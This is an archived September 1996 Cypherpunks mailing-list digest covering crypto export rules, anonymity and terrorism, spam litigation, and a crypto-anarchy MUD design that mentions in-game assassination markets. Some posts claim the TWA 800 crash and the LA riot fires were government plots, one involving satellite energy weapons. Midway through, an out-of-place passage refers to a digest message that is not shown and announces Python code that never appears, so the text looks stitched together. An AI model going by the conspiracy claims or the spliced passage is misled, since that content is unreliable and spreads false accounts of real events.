Date: Sun, 8 Sep 1996 07:54:40 +0800
Subject: /\/\/\/\/HELP\/\/\/\/\ !!!!!!!!!
Message-ID: <199609072146.QAA16610@netnet1.netnet.net>

I really need help unsubscribing from the Cypherpunks list! it is imperative!

From froomkin at law.miami.edu Sat Sep 7 17:04:11 1996
From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law)
Date: Sun, 8 Sep 1996 08:04:11 +0800
Subject: rc2 export limits..
In-Reply-To:
Message-ID:

isn't this what Bernstein's program that is the subject of a lawsuit in california does?

On Thu, 5 Sep 1996, P. J. Ponder wrote:

>
> keywords: ITAR, SHA, beneficial and innocuous crypto
>
> The persistent reputation known as Bill Stewart wrote:
>
> >Date: Wed, 04 Sep 1996 23:09:17 -0700
> >From: Bill Stewart
> >To: Kent Briggs <72124.3234 at compuserve.com>
> >Cc: cypherpunks at toad.com
> >Subject: Re: rc2 export limits..
> >
> >I'm afraid my source is "Read it on the net and was surprised to hear it".
> >My assumption is that the limit is for software that implements
> >both signature and verification, since ITAR doesn't ban export of
> >pure-authentication software.
>
> The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in
> the fine print at the beginning that SHA is export controlled. I don't
> have the document to refer to right now, but it plainly states that SHA
> falls under ITAR. As a cryptographic hash function, why would it be
> controlled in this way?
>
> How can I use SHA to encrypt something for someone else to decrypt? I
> know how to use it for authentication; am I missing something here?
>
> ANFSCD:
>
> I tried that OnNet32 e-mail software from FTP software. It runs under
> Windows95. It is a lot of material to download, and way too intrusive to
> install. It wants to metastasize itself into the innards of Microsoft
> Exchange and Inboxes, etc. What is it with all this complexity anyway?
> Why not just have a POP client that will check mail on the server?
>
> It also wants you to store your mailbox password in it, as opposed to
> letting you enter it on a session-by-session basis. I don't like that.
>
> sticking with PINE, PGP, and Xywrite II for now....
>

[This message may have been dictated with Dragon Dictate 2.01. Please be alert for unintentional word substitutions.]

A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law | froomkin at law.miami.edu
P.O. Box 248087 | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here. And #@&*! humid.

From hallam at ai.mit.edu Sat Sep 7 18:16:03 1996
From: hallam at ai.mit.edu (Hallam-Baker)
Date: Sun, 8 Sep 1996 09:16:03 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <50fonn$mta@life.ai.mit.edu>
Message-ID: <3231FB72.167E@ai.mit.edu>

John Gilmore wrote:

> PS: I would counsel against the kind of false anonymity provided by
> the Finnish server, though. Providing information under the promise
> that it will "never be revealed or misused" is a lot more dangerous
> than never providing it at all. E.g. "Anonymous cash" that is really
> based on dossiers or account-numbers isn't anonymous at all. Even
> physical cash is getting easier to trace; the British government has
> been tracking money by serial numbers for years, with custom machines
> in the banks, to de-anonymize Irish freedom-fighters (oops, I mean
> terrorists). Anonymity is another area, like privacy, where changes
> from technology can make big social differences.

There is a massive difference between anonymous speech and anonymous transactions. Anonymous speech can create problems (defamation etc.)
but in the main these are not problems the courts are particularly good at dealing with. In the UK the libel laws are not so much a redress for legitimate grievance than a way for a senior Tory to obtain a nice lump sum towards his pension if he should happen to be filmed handing over 5000 quid in a briefcase to a prostitute he'd never met.

The "problems" encountered by the Church of Scientology demonstrate that the court process itself can be immeasurably more harmful than any imagined grievance. Should society have laws to protect trades secrets? Probably, but not to protect the likes of the CoS. If the Internet makes such laws difficult to enforce then we should return to the original concerns that prompted society to create the laws in the first place and see if the Internet provides better ways of achieving the same result.

Anonymous transactions are a rather different matter. It is more difficult to argue for anonymity. The extreme examples of Chaumian cash create considerable difficulties such as making a perfect conduit for ransom proceeds and the profits of drug trafficking. Simply ignoring these problems will result in the proponents of anonymity simply being ignored.

The principal fear of the authorities appears to be terrorist rather than normal criminal activities. Terrorism is no longer limited to far off irredentist struggles that ex-patriates can harbour romantic thoughts about. The reality that the IRA is an organisation that murders children by placing a bomb in a rubbish bin outside a McDonald's has been brought home to the supporters of Noraid through the bombings of the World Trade Center, Oklahoma and Atlanta.

If one lives in a country where there is little terrorism it is easy to imagine that people driven to extreme actions are driven by an extreme situation. If one is faced with the reality of terrorism one soon reaches the conclusion that its perpetrators are simply ordinary psychopaths.
Having stated that terrorism is an important concern for the state it is necessary to ask whether it is necessary to restrict freedom to combat terrorism. In answering one must bear in mind that a central part of most terrorist strategies is to force the state to respond with disproportionate measures (here recent events in Chechnya indicate that Trotsky was not widely read in the USSR).

Absolutely anonymous cash may create problems, but what if it were possible to generate small quantities of "marked bills" within an otherwise anonymous system. If the circumstances under which the marked bills could be distributed were limited to a small set of tightly controlled circumstances the legitimate need of the government to oppose terrorism and organised crime could be met without imposing a Singapore style system with total monitoring.

In effect what is taking place is a negotiation between two groups, the government and civil rights activists. If one side refuses to consider the needs of the other they will be marginalised. Absolutism in politics is usually a bad thing. Politics usually works through compromises. The art being to ensure that one compromises the inessential terms in order to defend the key items.

In the present Presidential race the one policy area in which Clinton is potentially vulnerable is privacy. It's the one area which the Republicans could raise and claim it as their own (whether justifiable or not). The Clinton camp could not move from their current position without dropping Freeh overboard, since Freeh has run the FBI without any Ruby Ridge or Waco style cockups on his watch I don't think that is likely to happen.

If privacy is raised as a policy concern in this election it will reoccur in the next and both parties will have to justify their policies in terms of personal privacy as well as everything else. Just because the election is practically settled does not mean that the campaign will not affect what happens during the administration.
Clinton clearly wants Gore to be his successor and is going to want to make it as easy as possible for him to win. Clinton is the kind of politician I can trust - give him an issue and I trust him to look at the opinion polls. If Dole makes any kind of headway in '96 with a privacy plank then Gore will have to have one in 2000.

Phill

From raptrtrust at sigmais.com Sat Sep 7 18:18:08 1996
From: raptrtrust at sigmais.com (raptrtrust at sigmais.com)
Date: Sun, 8 Sep 1996 09:18:08 +0800
Subject: No Subject
Message-ID: <1.5.4.16.19960907184914.2e3f7388@sigmais.com>

Hello. I would like to know more about cryptography. Please send me any information that you have.

Thank you,
RaptrTrust

From rwright at adnetsol.com Sat Sep 7 18:34:25 1996
From: rwright at adnetsol.com (Ross Wright)
Date: Sun, 8 Sep 1996 09:34:25 +0800
Subject: /\/\/\/\/HELP\/\/\/\/\ !!!!!!!!!
Message-ID: <199609072326.QAA14153@adnetsol.adnetsol.com>

On Or About: 7 Sep 96 at 16:46, kickboxer wrote:

> I really need help unsubscribing from the Cypherpunks list! it is imperative!
>

HA HA HA HA HA HA!! That's soooo funny!!!

From frogfarm at yakko.cs.wmich.edu Sat Sep 7 18:53:14 1996
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Sun, 8 Sep 1996 09:53:14 +0800
Subject: Court challenge to AOL junk-mail blocks
In-Reply-To: <1.5.4.32.19960907204437.0068b4d8@pop3.interramp.com>
Message-ID: <199609072354.TAA28601@yakko.cs.wmich.edu>

> >It seems as though the judge was snookered by the spammers' claim of U.S.
> >Mail-like service, free speech, blah. The right to free speech does
> >extend to corporations; in that way, it includes the right *not* to speak.
>
> Declan raises a good point. But I'm guessing it's a bit more complex than
> that. CyberPromo and AOL lawyers tell me the court slapped down AOL simply
> to "keep the status quo." Both sides used those very words, in fact.
>
> What's more, CyberPromo talks a good game on the First Amendment, but used
> computer fraud and unfair competition statutes - not the Bill of Rights - in
> its original filing against AOL. So what's going on?

It may be because until the 14th amendment incorporated the BoR against the states, only individuals enjoyed its protections -- the Slaughterhouse cases extended the BoR to corporations. Or it may just be that CyberPromo knew they probably didn't have a leg to stand on when it came to the BoR, and decided to try a safer tack.

> It seems Weiner is _very_ aware that this case deals with things never
> before argued in court. No one has really sorted out just how much e-mail -
> if any - an ISP is obligated to carry against its wishes. What Weiner
> decides this fall may not set the kind of precedent that the case of the
> Pentagon Papers did, but will be important for a while at least.

Agreed. Regardless of the outcome, this is a case to watch.

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
Hey, Bill Clinton: You suck, and those boys died! I hope you die!
I feel a groove comin' on $ Freedom...yeah, right.

From jfricker at vertexgroup.com Sat Sep 7 20:17:44 1996
From: jfricker at vertexgroup.com (John F. Fricker)
Date: Sun, 8 Sep 1996 11:17:44 +0800
Subject: What the NSA is patenting
Message-ID: <2.2.32.19960908005316.00af91b4@vertexgroup.com>

At 04:56 PM 9/7/96 -0500, you wrote:
>John F. Fricker wrote:
>>
>> This excerpt from a Wired article/interview
>> http://www.hotwired.com/wired/3.10/departments/electrosphere/data.html
>>
>> "No data is totally safe," says Sharp ...
>
>That entire article struck me as a load of hogwash the first time I
>read it. This Sharp dude rehashed several old fairy tales about
>data recovery.
>

Actually Sharp appears only in that one quote. The article is poorly edited. The rest of the article quotes some other data recovery experts and "Sharp" is never mentioned again.
It's fun to debunk journalists but it takes more than saying "it's bunk".

--j

From jfricker at vertexgroup.com Sat Sep 7 20:41:10 1996
From: jfricker at vertexgroup.com (John F. Fricker)
Date: Sun, 8 Sep 1996 11:41:10 +0800
Subject: Deleted Message
Message-ID: <2.2.32.19960908012312.00b0b0b8@vertexgroup.com>

I wonder what I said?

At 08:41 PM 9/7/96 -24000, you wrote:
>To:
>From: MQG-SMTP3 at USMC_MASTERINET@Servers[]
>Subject: Re: Mail OnNet
> Message in Transport deleted by:
> ADMINISTRATOR at USMC_MASTERINET@Servers
>
>

From doom13 at juno.com Sat Sep 7 20:44:16 1996
From: doom13 at juno.com (Floyd W Odom)
Date: Sun, 8 Sep 1996 11:44:16 +0800
Subject: talker
Message-ID: <19960907.200300.3174.0.Doom13@juno.com>

Dear Whoever,
I am doom13. If there is anyone out there who is a hacker or would like to be one you can talk to me and find out stuff like cracking. Just drop a message at doom13 at juno.com.
Doom13

From dthorn at gte.net Sat Sep 7 21:13:08 1996
From: dthorn at gte.net (Dale Thorn)
Date: Sun, 8 Sep 1996 12:13:08 +0800
Subject: TWA 800 - Friendly Fire?
Message-ID: <323227A1.C1B@gte.net>

wrote:
> The one thing I have been thinking about, since the very beginning, is
> am I the only person who feels this might have been somewhat less than
> unintentional? It sure would be easy to take those rights away if
> everyone is afraid for their "lives"...
> Look at what has been happening in the news lately, and look at how
> much is "unexplained" or flimsy evidentially speaking, in the very
> least.
> If, for instance, the government wanted to cut down on civil
> liberties/civil rights, it would seem MIGHTY CONVENIENT that so much
> is "accidentally" happening so close together.
> Ditto with the Olympics thing.
> I vote something is QUITE fishy, and I guess I hope I'm not the only
> one paranoid enough to feel the same.

Sure something's fishy. Look at the technological capabilities they have, and we're not keeping up with them. One example: L.A. riots, 1992.
6,500 or so fires, unknown arsonist(s). But very convenient for clearing certain properties if you're putting in a new freeway or subway tunnel, and you don't want to have to fight with all the riffraff who might be resistant to getting up and moving.

So how do you light all those fires? Do it the hard way - plant the stuff (6,000-plus times!) and hope nobody catches your guys, or light 'em up from satellites, using "new experimental" focused energy. Gosh, Mr. Bill, would they do that? Guess it depends on what you're willing to believe.

Remember what Tom Wolfe wrote about? "The reason the folks on the East Coast (circa 1700's) were such easy victims for the pirates was the fact that they couldn't comprehend just how vicious and ruthless the pirates really were." (quote approximate).

From enzo at ima.com Sat Sep 7 21:40:15 1996
From: enzo at ima.com (Enzo Michelangeli)
Date: Sun, 8 Sep 1996 12:40:15 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <3231FB72.167E@ai.mit.edu>
Message-ID:

On Sat, 7 Sep 1996, Hallam-Baker wrote:

> There is a massive difference between anonymous speech and anonymous
> transactions. Anonymous speech can create problems (defamation etc.)
> but in the main these are not problems the courts are particularly
> good at dealing with.

Perhaps, but defamation is an issue that can't be ignored either, especially if one tries to build systems based on reputation.

Enzo

From perry at piermont.com Sat Sep 7 21:55:56 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 8 Sep 1996 12:55:56 +0800
Subject: /\/\/\/\/HELP\/\/\/\/\ !!!!!!!!!
In-Reply-To: <199609072146.QAA16610@netnet1.netnet.net>
Message-ID: <199609080247.WAA19662@jekyll.piermont.com>

kickboxer writes:
> I really need help unsubscribing from the Cypherpunks list! it is imperative!

God helps those who help themselves.
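Vladimir Nuri's message earlier in this digest ("Junk Phone Calls, Metered Usage, and Cellphones") proposes giving each audience its own password, possibly carried in the e-mail address, so that junk mail reveals which channel leaked and a "dirty" password can be cut off. The Python below is an added example, not code from any list member: the `user+label.tag@domain` layout, the HMAC-derived tag (so no table of issued passwords is needed and made-up labels fail), and every name in it are assumptions, and the sample messages are constructed.

```python
import hashlib
import hmac
import re
from email import message_from_string
from email.utils import getaddresses

LABEL_RE = re.compile(r"[a-z0-9-]+")  # keeps the "." separator unambiguous


class ChannelBook:
    """Per-audience mail "passwords" carried in the address itself.

    Assumed format (not from the post): user+label.tag@domain, where
    tag = first 12 hex chars of HMAC-SHA256(key, label).
    """

    def __init__(self, user, domain, key):
        self.user, self.domain, self.key = user.lower(), domain.lower(), key
        self.revoked = set()  # labels the owner has marked "dirty"
        self.hits = {}        # label -> number of accepted messages

    def _tag(self, label):
        mac = hmac.new(self.key, label.encode(), hashlib.sha256)
        return mac.hexdigest()[:12]

    def issue(self, label):
        """Create the address to hand out to one audience."""
        if not LABEL_RE.fullmatch(label):
            raise ValueError("label must match [a-z0-9-]+")
        return f"{self.user}+{label}.{self._tag(label)}@{self.domain}"

    def revoke(self, label):
        self.revoked.add(label)

    def _channel(self, addr):
        """Return the label if addr carries a valid tag for us, else None."""
        local, _, domain = addr.lower().rpartition("@")
        user, plus, rest = local.partition("+")
        label, dot, tag = rest.rpartition(".")
        if domain != self.domain or user != self.user or not (plus and dot):
            return None
        if not LABEL_RE.fullmatch(label):
            return None
        # Constant-time comparison: a guessed or altered tag is just untagged mail.
        if not hmac.compare_digest(tag.encode(), self._tag(label).encode()):
            return None
        return label

    def classify(self, raw_message):
        """Return (verdict, label) for one RFC 822 message.

        Header recipients are used to keep the example short; a mail server
        would apply the same check to the SMTP envelope recipient.
        """
        msg = message_from_string(raw_message)
        rcpts = getaddresses(msg.get_all("To", []) + msg.get_all("Cc", []))
        verdict = ("low-priority", None)  # no valid password: the low bin
        for _name, addr in rcpts:
            label = self._channel(addr)
            if label is None:
                continue
            if label in self.revoked:
                return ("reject", label)  # names the channel that leaked
            self.hits[label] = self.hits.get(label, 0) + 1
            verdict = ("accept", label)
        return verdict


def demo():
    """Constructed run: a lecture audience's address, before and after revocation."""
    book = ChannelBook("vz", "example.org", key=b"constructed demo key")
    lecture = book.issue("lecture96")

    def mail(to):
        return f"From: someone@example.net\nTo: {to}\nSubject: hi\n\nbody\n"

    results = [book.classify(mail(lecture)),
               book.classify(mail("vz@example.org"))]
    book.revoke("lecture96")  # the address reached a marketer
    results.append(book.classify(mail(lecture)))
    return results


if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```

Because a rejected message still reports its label, the owner learns which audience's address leaked and can issue a fresh label to that audience alone.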
From attila at primenet.com Sat Sep 7 22:21:23 1996
From: attila at primenet.com (attila)
Date: Sun, 8 Sep 1996 13:21:23 +0800
Subject: talker
In-Reply-To: <19960907.200300.3174.0.Doom13@juno.com>
Message-ID: <199609080305.VAA14256@InfoWest.COM>

In <19960907.200300.3174.0.Doom13 at juno.com>, on 09/07/96 at 09:52 PM, doom13 at juno.com (Floyd W Odom) said:

=Dear Whoever,
= I am doom13. If there is anyone out there who is a hacker or would
=like to be one you can talk to me and find out stuff like cracking.
=Just drop a message at doom13 at juno.com.
=Doom13

aw... come on, guy. in 25 years of the net, I've seen more than a few go down and these are generally not so blatant.

up until 15 years ago when some 'strike panic in their hearts' bleeding pansy Wall Street Journal liberal journalist confused hacking with cracking, "hacker" had been a *badge of honor*

hacking was a term used among professionals to define someone much more than a programmer, or as one of the definitions put it: programmers program code, hackers tweak code.

so, take your trolling hooks back to your government leash; go out and have some legitimate fun at your tender young age.

cypherpunks are *not* crackers; this is a cryptographic and political issues relating to cryptography mailing list. join one of the usenet groups such as alt.hacker or 2600 if you want that kind of action.

have a good day!

--
one of the few things we all share: the utter, corrosive contempt for our elected officials.

From jleonard at divcom.umop-ap.com Sat Sep 7 22:32:21 1996
From: jleonard at divcom.umop-ap.com (Jon Leonard)
Date: Sun, 8 Sep 1996 13:32:21 +0800
Subject: MUD anyone?
In-Reply-To:
Message-ID: <9609080251.AA22510@divcom.umop-ap.com>

Mark Grant wrote:
> On Tue, 27 Aug 1996, Jon Leonard wrote:
>
> > I've been planning to run a MUD like that, at mud.umop-ap.com port 2121.
> > I just don't have enough coded to be worth announcing yet.
>
> Cool. What's it running under? I was planning to base it around the latest
> version of the Nightmare library for MudOS, which I just downloaded. If I
> can get a copy somehow I could start hacking on it.

I've written the server from scratch, and don't have much of a mudlib at this point. The language is lisp-ish, although I'm planning to write a parser for a c-like syntax. It's properly tail-recursive, has explicit continuations, and has associative arrays as a native datatype.

It's probably easiest for me to create an account on umop-ap.com for anyone interested in collaborating with me. If the consensus is that starting with an existing MUD is easier, that's fine too.

> > Pseudonyms
> > Anonymous digital cash (issued by any pseudonym, not just "banks")
> > Public and private keys
> > Secret sharing
> > Anonymous broadcast & message pools
> > Anonymous markets
>
> All sounds like good stuff to me... DC Nets as well, of course. I guess we
> should also simulate the Net somehow, with Web servers, email, etc.

Are DC-nets useful for anything besides anonymous broadcast? I'd probably cheat on implementation unless there is some other property that I'm missing.

For network-related stuff, I've been considering a fantasy setting, but one that allows for "magical" instantaneous long-distance communication between any two objects. Web servers wind up being persistent spells, email is really easy, and so on.

> Though the Nightmare library apparently lets you create Mud objects which
> can access the Web so perhaps we can use the real one somehow (with the
> obvious security implications).

I'm reluctant to involve the outside world in a MUD except as a source of players. This is partially due to security and extra programming complexity, but mostly because I'd want to isolate the game from the pressures that being a remailer or anonymizer brings.

> What else?
>
> Protection Agencies
> Escrow Agencies
> Private Law Courts (probably controlled by players rather than the
> computer)
> Reputation Agencies

With the possible exception of Escrow, I'd make these player functions rather than server functions. They are important, of course.

There are a number of things in "Applied Cryptography" that I missed, significantly:

Timestamping
Subliminal channels
Secure multiparty Computation
Blind signatures
Oblivious Transfer

> > What am I missing? Should there be direct support for Jim Bell's
> > assassination markets? It'd provide a means of demonstrating its
> > ineffectiveness as a means of social control.
>
> I think it should be incorporated, but I think that people can set them up
> easily themselves. Perhaps we should have an NPC-run 'Assassins Inc' which
> would run the lottery, and then players could do the actual 'wet work'.

It could be PC-run, too. Then again, how can you tell the difference?

> But yes, I'd really like to see how this would work in the game. As I
> said I'm thinking of this more as a semi-scientific experiment than a
> pure game. We have some idea of how this stuff should work in theory, but
> little of how it works in practice.

I'm still primarily looking at the game aspect. After all, if it isn't an interesting game, then there won't be enough players to get meaningful results. We need real humans making the various economic decisions in order to reduce the consequences of programmer bias.

Also, there's the teaching possibility. Where a simulation would only appeal to those who are already of a libertarian bent, a working anarchic MUD might reach others.

> I do think though that we'd have to enforce some kind of rule against
> 'disposable characters', otherwise people could simply create a new
> character every time they were killed trying to assassinate someone. There
> would need to be some disadvantage to just going in guns-blazing and being
> killed ten times in a row.
If a new character is significatly weaker than an experienced character, then this may not be a problem. They simply wouldn't have enough of a chance against a real target to be more than an annoyance. Alternately, having the game prevent new characters from starting fights with other players stops this quite quickly. That's what we did on the LPmud I ran. I'd prefer that the only rules be against trying to bring down the server, though. What's the point of an anarchy with rules? For the general problem of making player death costly, I'd been planning on having some abilities reside in a "soul" and some in the "body". If a body dies, that's it for that body. The player has to start over with a new, untrained, body. This can be a problem if, for example, the soul's main fighting skill is with a weapon that the body isn't yet strong enough to lift. > > I think that for purposes of simulation, it's reasonable to model > > cryptographic primitives in a "Trust the server" mode, because you > > need to trust the MUD server anyway (unlike a government), and it > > puts a much lower load on the CPU. > > Yep, I agree. I would like to include the real protocols but it's going to > be far too slow. So we could create, say, remailer objects, anonymous > digital cash objects, etc. As long as they have the same properties in > 'SimAnarchy' as they would in real life then the actual behind the scene > mechanics don't matter. We could, perhaps, allow characters to break > protocols if they could accumulate enough processing power. Since real-world stuff is apparently nearly immune to brute force, I'd go all the way and make the game stuff truly immune. Breakability is a feature that just isn't worth the effort to code, especially since we're interested in the consequences of unbreakable crypto. > I don't know how low a level we'd want to go to. 
I think that having an > explicit group of remailers (and 'IP rerouters') would be a good idea as > it would allow people to try to crack messages and perform traffic analysis. > Some remailers could be run by NPCs (some of whom would be trustworthy and > some wouldn't), others by the players themselves (with or without logging > enabled). I could go either with that, or a net that really is secure and unsnoopable. > I'd like to also include some way by which players could write 'software' > even if they weren't able to create new objects for the game. So they could > perhaps write front-ends for remailers and give them away or sell them to > other players. The obvious analogue to software in a fantasy setting is spells. This requries security of the server from arbitrary player code, but that's been one of my design goals for some time. > > There's also the question of log policy. Having run a MUD for a few > > years, I want to keep logs for bug detection. A declared policy that > > they aren't released for n years would work though. Opinions, anyone? > > Part of me thinks that we should explicitly state that anything may be > logged and used in sociological research. Perhaps we could create some > kind of secure protocol to allow users to connect without revealing their > real identities, so that it wouldn't matter if they were logged? A general disclaimer that anything can be logged is almost mandatory. Logs are too useful for debugging. Still, I'd prefer to periodically trim the logs so that no one can meaningfully demand them. Besides, writings from a player perspective are probably better anyway. Now that I think about it, having a character (player or non) who acts as a historian and news service would be good anyway. As for logging without real identities, that's not enough -- pseudonyms can be recognized and outed by textual analysis. 
A certain amount of caution is always necessary if you're doing something that you wouldn't want made public, but I don't want the MUD to require any more than that fundamental minimum. > Anyone want to set up a mailing list for this discussion? How about mud at umop-ap.com? I'm currently the only subscriber, but that can be fixed. > Mark Jon From gbroiles at netbox.com Sat Sep 7 22:36:44 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Sun, 8 Sep 1996 13:36:44 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi Message-ID: <2.2.32.19960908032421.007004c0@mail.io.com> >The principle fear of the authorities appears to be terrorist rather >than normal criminal activities. Either that, or the fear that authorities are no longer necessary unless they can point to something dangerous that they're protecting the rest of us from - with the plausibility of the Godless Communist Threat waning, it becomes necessary for drug sellers and people with fringe politics to appear more threatening. Support (political and financial) for the exercise of power is a function of the anxiety level of the populace. People whose income and sense of self-worth is derived from that exercise of power have a clear interest in maintaining or increasing the level of anxiety. Do you imagine a future in which law enforcement holds a press conference to announce "We're mostly eating donuts and reading magazines. There's not much for us to do. Perhaps half of us should be laid off or something."? Can you imagine the military spontaneously downsizing, or failing to oppose reductions in force? >Terrorism is no longer limited to far >off irredentist struggles that ex-patriates can harbour romantic >thoughts about. The reality the the IRA is an organisation that murders >children by placing a bomb in a rubbish bin outside a MacDonalds has >been brought home to the suporters of Noraid through the bombings of the >World Trade Center, Oaklahoma and Atlanta. 
While domestic terrorist events may bring a sharper focus to discussions of the merits and costs of politically motivated violence, your fantasy that it will somehow bring about a change in someone's substantive politics is amusing. It seems at least as likely that domestic repression purportedly adopted in "response" to recent events will create a feeling of solidarity with people living under Orwellian governments. ("Of course those guys over there are blowing things up. Their government sucks. Hey, our government is starting to suck. Let's blow some stuff up.") Further, your notion that "terrorism" has somehow been limited to "far-off irredentist struggles" of concern only to expatriates is ridiculous. Have you not noticed the arson, bombings, and shootings at abortion clinics in the US? Or the history of violence on the (neo-) left, e.g., the Weather Underground, etc.? Or the history of the KKK and race-motivated lynchings/beatings? Or the Unabomber? >If one lives in a country >where there is little terrorism it is easy to imagine that people driven >to extreeme actions are driven by a extreeme situation. If one is faced >with the reality of terrorism one soon reaches the conclusion that its >perpetrators are simply ordinary psychopaths. Isn't it wonderful that "one" unavoidably "reaches conclusions" which eliminate moral and political arguments you find uninteresting? We might as well announce that "One soon learns that repression will never eliminate violent opposition" or some other arguable proposition. Deciding that every person who supports or engages in politically motivated violence is an "ordinary psychopath" suggests that many, many people are psychopaths; and that makes the diagnosis of "psychopath" unremarkable. Was that really your point? >Having stated that terrorism is an important concern for the state it is >necessary to ask whether it is necessary to restrict freedom to combat >terrorism. 
In answering one must bear in mind that a central part of >most terrorist strategies is to force the state to respond with >disproportionate measures (here recent events in Chetchnya indicate that >Trotsky was not widely read in the USSR). Or perhaps "it is necessary to ask" whether restricting pre-existing freedom has ever reduced or eliminated "terrorism"; it's certainly worked well in Lebanon and the Palestine, in Germany, Japan, and Peru .. or has it? (But as counterexamples, we've got the Soviet Union under Stalin, Germany under Hitler, Italy under Mussolini, Chile under Pinochet, Cuba under Castro, Nicaragua in the mid-80's, and China. Perhaps you're right.) >Absolutely anonymous cash may create problems, but what if it were >possible to generate small quantities of "marked bills" within an >otherwise anonymous system. If the circumstances under which the marked >bills could be distributed were limited to a small set of tightly >controlled circumstances the legitimate need of the government to oppose >terrorism and organised crime could be met without imposing a Singapore >style system with total monitoring. Boy, if we could just figure out the right combination of procedural rules, we could simply abandon all of this problematic "rights" stuff. Wouldn't that be a lot simpler? These pesky "rights" keep getting in the way of legitimate government needs. Shit. >In effect what is taking place is a negotiation between two groups, the >government and civil rights activists. If one side refuses to consider >the needs of the other they will be marginalised. Absolutism in politics >is usually a bad thing. Politics usually works through compromises. The >art being to ensure that one compromises the inessential terms in order >to defend the key items. Don't forget that it's necessary to adopt an exaggerated version of your own position, such that you can "compromise" your way to "agreeing" on exactly what you wanted in the first place. 
It's also useful to categorize your opponent's position as "extreme", "radical", "unworkable", "unrealistic", or "militant" - such that they cannot continue to maintain it and remain "reasonable". (e.g., "extreeme [sic] examples of Chaumian cash") In effect what is taking place is a negotiation between two groups, the government and civil rights activists. The government is asking us if we'd rather be shot in the right kneecap or the left kneecap to ensure that we don't try to run from the legitimate needs of the government. If the civil rights groups don't get on the bandwagon and pick a kneecap, they'll lose any chance they had to have an influence over this crucial process of self-government. Would you like one lump, or two? >If privacy is raised as a policy concern in this >election it will reoccur in the next and both parties will have to >justify their policies in terms of personal privacy as well as >everything else. Not if "privacy" is considered something suspicious which only extremist militant pro-pedophile terrorists would be interested in. After all, every reasonable person is open to compromising in order to accommodate the state's legitimate interest in preventing bad things from happening, right? And if a little repression and loss of privacy doesn't seem to improve things, we'd better just have some more, hmm? Never can get too much of that compromise stuff. -- Greg Broiles |"Post-rotational nystagmus was the subject of gbroiles at netbox.com |an in-court demonstration by the People http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt |Studdard." People v. Quinn 580 NYS2d 818,825. 
From pgut001 at cs.auckland.ac.nz Sat Sep 7 22:37:57 1996
From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz)
Date: Sun, 8 Sep 1996 13:37:57 +0800
Subject: What the NSA is patenting
Message-ID: <84215235509971@cs26.cs.auckland.ac.nz>

>>>United States Patent                    Patent Number: 5264794
>>>                                        Date of Patent: 23 Nov 1993
>>>
>>>Method of measuring magnetic fields on magnetically recorded media using a
>>>scanning tunneling microscope and magnetic probe

>>techology isn't much different from what's publicly available), in this case
>>all they were doing was protecting their investment (just like the various PKC
>>patents originally assigned to universities).

>I'm sure there's going to be a REALLY marketable device out of this to get
>royalties off of.

No, the market for the more mainstream MFM's is small (a few K devices), for MFSTM's it's even smaller (a few dozen?). MFSTM's are usually built by universities for research purposes, which means the patent won't affect them. As I said before, it's purely a "we paid for the research, we want some paper to wave around to justify the cost" thing.

>Question: if we pay taxes, then we pay for the research. if we pay for the
>research, we should be able to see the results, just like shareholders in a
>company.

You can see the results, just read the Journal of Applied Physics or IEEE Transactions on Magnetics. I know people like to come up with conspiracy theories about the NSA, but this patent won't work as the basis for one.

Peter.

From perry at piermont.com Sat Sep 7 22:49:02 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 8 Sep 1996 13:49:02 +0800
Subject: talker
In-Reply-To: <19960907.200300.3174.0.Doom13@juno.com>
Message-ID: <199609080340.XAA19752@jekyll.piermont.com>

Floyd W Odom writes:
> I am doom13. If there is anyone out there who is a hacker or
> would like to be one you can talk to me and find out stuff like cracking.
> Just drop a message at doom13 at juno.com.
Are you the same jerk who was posting a week ago? From accessnt at ozemail.com.au Sat Sep 7 22:56:38 1996 From: accessnt at ozemail.com.au (Mark Neely) Date: Sun, 8 Sep 1996 13:56:38 +0800 Subject: TWA 800 - Friendly Fire? Message-ID: <2.2.32.19960908041522.006d97d8@ozemail.com.au> >Look at what has been happening in the news lately -- and look at how >much is "unexplained" or flimsy evidencially speaking, in the very least. >If, for instance, the government wanted to cut down on civil >liberties/civil rights, it would seem MIGHTY CONVENIENT that so much is >"accidentally" happening so close together. >-Millie >sfuze at tiac.net Yes, I wonder if the WhiteHouse will rush through a bill overturning the anti-terrorist measures which they justified on the basis of the TWA bombing. Regards, Mark ___ Mark Neely - accessnt at ozemail.com.au Lawyer, Internet Consultant, Professional Cynic Author: Australian Beginner's Guide to the Internet (2nd Ed.) Australian Business Guide to the Internet Internet Guide for Teachers, Students & Parents Check out my Anti-SPAM FAQ: http://www.accessnt.com.au/faqs/spam.htm From jfricker at vertexgroup.com Sat Sep 7 22:59:17 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Sun, 8 Sep 1996 13:59:17 +0800 Subject: [PARANOID NOISE]Re: TWA 800 - Friendly Fire? Message-ID: <2.2.32.19960908035047.00aff470@vertexgroup.com> At 06:55 PM 9/7/96 -0700, you wrote: > wrote: >> The one thing I have been thinking about, since the very beginning, is >> am I the only person who feels this might have been somewhat less than >> unintentional? It sure would be easy to take those rights away if >> everyone is afraid for their "lives"... >> Look at what has been happening in the news lately, and look at how >> much is "unexplained" or flimsy evidencially speaking, in the very >> least. 
>> If, for instance, the government wanted to cut down on civil
>> liberties/civil rights, it would seem MIGHTY CONVENIENT that so much
>> is "accidentally" happening so close together.
>> Ditto with the Olympics thing.
>> I vote something is QUITE fishy, and I guess I hope I'm not the only
>> one paranoid enough to feel the same.
>
>Sure something's fishy. Look at the technological capabilities they
>have, and we're not keeping up with them. One example:
>
>L.A. riots, 1992. 6,500 or so fires, unknown arsonist(s). But very
